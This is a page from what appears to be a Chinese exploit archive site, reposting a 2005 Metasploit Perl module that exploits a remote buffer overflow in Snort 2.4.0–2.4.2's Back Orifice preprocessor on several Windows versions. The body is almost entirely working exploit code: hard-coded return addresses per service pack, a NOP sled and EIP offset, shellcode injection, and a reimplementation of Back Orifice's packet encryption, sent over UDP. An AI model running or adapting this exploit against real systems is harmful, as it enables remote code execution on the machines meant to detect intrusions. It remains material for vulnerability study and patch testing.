首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Snort Back Orifice Pre-processor Remote Buffer Overflow Exploit
来源:trir00t@gmail.com 作者:Kira 发布时间:2005-11-08  

Snort Back Orifice Pre-processor Remote Buffer Overflow Exploit (Win32)


###############################################
# for educational purpose only
# by Kira < trir00t [at] gmail.com >
###############################################
package Msf::Exploit::snort_bo_overflow_win32;
use base 'Msf::Exploit';
use strict;
use Pex::Text;

my $holdrand;
my $advanced = {};

my $info =
{
'Name' => 'Snort Back Orifice Preprocessor Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>', ],
'Arch' => ['x86'],
'OS' => ['win32', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 53],
},

'Payload' => {
'Space' => 1024, # you can use more spaces
'BadChars' => "\x00",
},

'Description' => Pex::Text::Freeform(qq{
This exploits the buffer overflow in Snort version
2.4.0 to 2.4.2. This particular module is capable of
exploiting the bug on x86 Win32, Win2000, WinXP and Win2003.
Exploitation in this vulnerability is depend on many factors.
Difference in GCC version, compiled option and
operating system made diffent technique in exploitation.
}),

'Refs' => [
['URL ', "http://www.securityfocus.com/bid/15131"],
],

'Targets' => [

["Snort 2.4.2 Binary on Windows XP Professional SP1", 0x77da54d4,
(18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows XP Professional SP2", 0x77daacdb,
(18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows Server 2003 SP1", 0x7d065177,
(18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows Server 2000 SP0", 0x77e33f69,
(18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows 2000 Professional SP0", 0x7850cdef,
(18+1024+1028+1024)],
],

'Keys' => ['Snort'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return ($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;

my $target = $self->Targets->[$target_idx];

if(! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}

my $socket = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);

if($self->IsError) {
$self->PrintLine("[*] Error creating socket: " .
$socket->GetError);
}

$self->PrintLine(sprintf("[*] Trying " . $target->[0] . "
using return address 0x%.8x....", $target->[1]));

my $payload = "*!*QWTY?"; # Magic string: 8 bytes
$payload .= pack('V', $target->[2]); # Len: 4 bytes
$payload .= "\xed\xac\xef\x0d"; # UDP packet id
$payload .= "\x01"; # BO type (PING)
$payload .= "\x90" x 1024; # Data
$payload .= "\x90" x 1024; # offset to EIP
$payload .= pack('V', $target->[1]); # return address
$payload .= $shellcode; # our shellcode

$payload = bocrypt($payload); # encrypted payload

$self->PrintLine("[*] Sending Exploit....");
$socket->Send($payload);
}

sub bocrypt {
my $tmppayload = shift;
my @arrpayload = split(//, $tmppayload);
my $retpayload;
my $c;

msrand(31337);

foreach $c (@arrpayload) {
$retpayload .= chr((ord($c) ^ (mrand()%256)));
}
return ($retpayload);
}

sub msrand {
$holdrand = shift;
}

sub mrand {
return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16) & 0x7fff);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Net Portal Dynamic System Deni
·Linux ftpd SSL Buffer Overflow
·Snort Back Orifice Pre-process
·F-Secure Anti-Virus and Intern
·Microsoft Windows Plug and Pla
·SuSE Linux pwdutils chfn Utili
·iGENUS WebMail <= 2.0.2 rem
·Snort <= 2.4.2 Back Orifice
·Local privilege escalation exp
·WF-Downloads Module for XOOPS
·ArGoSoft FTP Server Remote Buf
·Windows 2000 Server UPNP DoS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved